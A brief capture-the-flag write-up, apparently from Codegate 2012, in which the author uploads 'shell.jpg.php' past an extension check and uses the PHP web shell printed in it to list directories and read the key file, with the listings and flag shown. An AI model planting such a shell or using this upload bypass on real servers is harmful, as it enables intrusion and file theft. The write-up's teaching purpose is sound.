Our aim was to get shell.
Summary: upload php shell, read the key.
We need to get a shell, so it should be a good idea to upload a php script. But there’s a check on extension!
Luckily, only a presence of “.jpg” is checked, so we can upload “shell.jpg.php” file.
Let’s upload this simple shell:
<?php if ($_GET["d"]) print_r(scandir($_GET["d"])); if ($_GET["f"]) echo highlight_file($_GET["f"]); ?>
With this script we can list any directory and read any file. Let’s find the key. Usually on Win servers it’s located on the user’s Desktop:
Array (  => .  => ..  => All Users  => Default  => Default User  => Public  => codegate2  => desktop.ini  => test )
Array (  => .  => ..  => APMSETUP Monitor.lnk  => Codegate 2012 Key.txt  => desktop.ini )
Yes, here it is:
<? /* Good Job ! Key is 16b7a4c5162d4dee6a0a6286cd475dfb */ ?> 1
The flag: 16b7a4c5162d4dee6a0a6286cd475dfb